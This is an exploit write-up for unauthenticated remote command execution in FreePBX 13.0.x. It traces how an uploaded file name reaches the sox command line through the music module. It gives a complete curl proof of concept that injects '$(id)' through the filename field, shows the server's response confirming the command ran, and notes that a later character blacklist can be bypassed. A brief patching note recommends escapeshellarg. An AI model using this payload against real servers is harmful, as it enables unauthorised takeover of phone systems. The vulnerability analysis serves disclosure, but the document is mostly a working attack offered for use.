Vulnerable software : Freepbx
Tested versions : 13.0.x < 13.0.154
vendor : freepbx.org
Author : i-Hmx
Email : [email protected]
Home : sec4ever.com
Knock knock people , Eg-R1z on the mic again . .
Freepbx is vulnerable to unauthenticated remote command execution due to multiple weak input validations as well as a partial authentication bypass
Need more technical shit?!
Here u go
File : /var/www/html/admin/libraries/Composer/vendor/symfony/process/Symfony/Component/Process/Process.php
class Process
{
const ERR = 'err';
const OUT = 'out';
const STATUS_READY = 'ready';
const STATUS_STARTED = 'started';
const STATUS_TERMINATED = 'terminated';
Line 145:
public function __construct($commandline, $cwd = null, array $env = null, $input = null, $timeout = 60, array $options = array())
{
if (!function_exists('proc_open')) {
throw new RuntimeException('The Process class relies on proc_open, which is not available on your PHP installation.');
}
--===>>> $this->commandline = $commandline;
$this->cwd = $cwd;
Line 275
$commandline = $this->commandline;
if ('\\' === DIRECTORY_SEPARATOR && $this->enhanceWindowsCompatibility) {
$commandline = 'cmd /V:ON /E:ON /C "('.$commandline.')';
foreach ($this->processPipes->getFiles() as $offset => $filename) {
$commandline .= ' '.$offset.'>'.ProcessUtils::escapeArgument($filename);
}
$commandline .= '"';
if (!isset($this->options['bypass_shell'])) {
$this->options['bypass_shell'] = true;
}
}
--===>>> $this->process = proc_open($commandline, $descriptors, $this->processPipes->pipes, $this->cwd, $this->env, $this->options);
Class is being called at
File : /var/www/html/admin/libraries/media/Media/Driver/Drivers/SoxShell.php
Line 118
public function convert($newFilename,$extension,$mime) {
switch($extension) {
case "wav":
switch($this->extension) {
case "sln":
$process = new Process($this->binary.' -t raw -s -b 16 -r 8000 '.$this->track.' -r '.$this->options['samplerate'].' -b '.$this->options['bitdepth'].' -c 1 '.$newFilename);
break;
case "sln12":
$process = new Proces.................
case "wav16":
---===>> $process = new Process($this->binary.' '.$this->track.' -t wav -b 16 -r 16000 -c 1 '.$newFilename);
break;
default:
$process = new Process($this->binary.' '.$this->track.' -c 1 '.$newFilename);
break;
}
if(!$this->background) {
---===>> $process->run();
if (!$process->isSuccessful()) {
throw new \RuntimeException($process->getErrorOutput());
}
} else {
$process->start();
if (!$process->isRunning()) {
throw new \RuntimeException($process->getErrorOutput());
}
}
}
SoxShell can be called from multiple parts of FreePBX, including the music module
File : admin/modules/music/Music.class.php
Line : 407
$name = $dname . '.' . $extension;
move_uploaded_file($tmp_name, $this->tmp."/".$name);
$media->load($this->tmp."/".$name);
foreach($_POST['codec'] as $c) {
--==>> $media->convert($path."/".$dname.".".$c);
}
unlink($this->tmp."/".$name);
this part can be reached by an unauthenticated user, and since the uploaded filename flows unescaped into the sox command line it is an obvious command execution vulnerability :/
POC :
[root:/lab/fpbx]# curl -i -s -k -X 'POST' \
-H 'User-Agent: sec4ever 1337s' -H 'Referer: http://x.x.x.x/admin/ajax.php' -H 'Content-Type: multipart/form-data; boundary=---------------------------317092200613369' \
--data-binary $'-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"extension\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"language\"\x0d\x0a\x0d\x0aen\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"filename\"\x0d\x0a\x0d\x0afa.wav\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"codec[1]\"\x0d\x0a\x0d\x0agsm\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"id\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"files[1]\"; filename=\"$(id).wav\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0aEg-R1z ruling you ;)\x0d\x0a-----------------------------317092200613369\x0d\x0a\x0d\x0a' \
'http://x.x.x.x/admin/ajax.php?module=music&command=upload'
HTTP/1.1 500 Internal Server Error
Date: Wed, 07 Sep 2016 17:33:02 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.28
Set-Cookie: lang=en_US
Set-Cookie: PHPSESSID=6j9ei3pn1btu2o6jc1j6mngmp4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Ignore-This: 1
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json
{"error":{"type":"RuntimeException","message":"\/usr\/bin\/sox formats: can't open input file `groups=498(asterisk).wav': No such file or directory\n","file":"\/var\/www\/html\/admin\/libraries\/media\/Media\/Driver\/Drivers\/SoxShell.php","line":194}}#
Patching : wrap every user-controlled value that SoxShell concatenates into the Process command line (the track path, the new filename and the options) in escapeshellarg() before it is passed to Process; a blacklist of characters is not a substitute for that
Only partially fixed in later FreePBX versions
# in this version the characters space, ', `, /, \, <, >, ?, &, | are filtered, which is a blacklist and can be super easily bypassed
# make a priv8 , burn another ;)
# From Eg-R1z with Love xD